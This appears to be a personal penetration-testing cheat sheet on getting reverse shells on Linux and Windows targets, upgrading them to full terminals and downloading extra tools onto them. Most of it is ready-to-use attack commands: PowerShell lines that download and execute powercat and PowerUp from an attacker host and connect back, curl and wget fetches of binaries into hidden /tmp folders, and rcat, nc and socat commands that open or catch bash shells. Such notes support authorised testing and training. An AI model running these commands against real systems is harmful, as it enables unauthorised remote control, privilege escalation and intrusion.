
Getting shells, interacting with them, and getting extra utilities installed (if possible).

Linux-oriented for now.

Local Webserver

If needed, spin up a webserver that the target machine can reach out to:

sudo mkdir -p /srv/http/linux/ /srv/http/windows/
sudo chmod -R 777 /srv/http/

cd /srv/http/
python -m http.server 80

Ideally this will run as a systemd service or something so you don't have to keep a terminal open.

For the actual binaries, some resources:

Pre-compiled golang and rust binaries are pretty handy too.

Caveat for rust: muslopen in new window builds are preferred if available, otherwise the target's glibc version must be greater than or equal to the version used to compile the binary (backwards compatibility). Only exception is if the binary requires glibc-specific functionality - in that case, build in a Docker container with a glibc version compatible with the target's if possible.

Reverse Shells



Simplest way is to use PowerCatopen in new window:

IEX (New-Object System.Net.Webclient).DownloadString("http://$remote_host/windows/powercat.ps1")
powercat -c $remote_host -p $remote_port

From there, same idea applies if we want to use PowerUpopen in new window:

IEX (New-Object System.Net.Webclient).DownloadString("http://$remote_host/windows/PowerSploit/Privesc/PowerUp.ps1")
Invoke-PrivescAudit  # for example



This one is the most barebones, but is pretty solid.


rlwrap nc -nvlp $remote_port

Note the use of rlwrap - it'll preserve line history and allow you to actually use arrow keys.


rcat is also a pretty solid choice, although I've found it to not be 100% reliable at times (e.g. randomly hanging during a session).


export target_host=""
export rcat_log_dir="/var/log/rcat"

sudo mkdir -p "${rcat_log_dir:?}"
sudo chmod 777 "${rcat_log_dir:?}"

rcat listen -ib 4444 2>&1 | tee "${rcat_log_dir:?}/${target_host:?}_$(isodate).log"


mkdir /tmp/.tools
curl http://${remote_host:?}:${remote_http:-80}/linux/rcat -o /tmp/.tools/rcat
chmod +x /tmp/.tools/rcat
rcat connect -s bash $remote_ip $remote_port

Upgrading Shells

Drawn from ropnop's guideopen in new window, with a couple customizations for my own convenience.

First things first (might need to move this to later due to possible bash-specific syntax):

mkdir -p /tmp/.local/bin
export PATH="/tmp/.local/bin:${PATH}"
export SHELL=bash
export TERM=xterm256-color
export remote_host=""
export remote_port="4444"
export remote_http="80"

# For my directory structure in particular
function download_bin() {

  wget http://${remote_host:?}:${remote_http:-80}/${1:?} -O /tmp/.local/bin/${1} \
    || wget http://${remote_host:?}:${remote_http:-80}/linux/${1:?} -O /tmp/.local/bin/${1}

  chmod +x /tmp/.local/bin/${1:?}


Some aliases if/once the commands are available:

alias exa='exa -lagF --time-style=long-iso --git --group-directories-first'

Option 1 (Python)

Download Python first if needed, then:

python -c 'import os; os.system("/usr/bin/env bash"); exit();'

To upgrade even more, press Ctrl+Z to send the shell to the background, and then:

stty raw -echo
stty_rows=$(stty -a | grep -oP "; rows \K[\d]{1,}")
stty_columns=$(stty -a | grep -oP "; columns \K[\d]{1,}")
stty rows $stty_rows columns $stty_columns

Option 2 (socat)



socat file:`tty`,raw,echo=0 tcp-listen:4444


socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$remote_host:$remote_port
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